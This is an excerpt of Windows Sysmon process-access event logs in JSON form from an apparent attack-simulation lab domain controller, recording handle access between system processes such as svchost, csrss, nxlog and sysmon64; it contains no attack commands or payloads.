{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.487\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.487","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2264\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nTargetProcessId: 3836\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\wbem\\wmisvc.dll+21c4|c:\\windows\\system32\\wbem\\wmisvc.dll+2031|C:\\Windows\\SYSTEM32\\ntdll.dll+7df1d|C:\\Windows\\SYSTEM32\\ntdll.dll+45ce9|C:\\Windows\\SYSTEM32\\ntdll.dll+29bdf|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2264","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-001016170600}","TargetProcessId":"3836","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\wbem\\wmisvc.dll+21c4|c:\\windows\\system32\\wbem\\wmisvc.dll+2031|C:\\Windows\\SYSTEM32\\ntdll.dll+7df1d|C:\\Windows\\SYSTEM32\\ntdll.dll+45ce9|C:\\Windows\\SYSTEM32\\ntdll.dll+29bdf|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nTargetProcessId: 3836\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-001016170600}","TargetProcessId":"3836","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 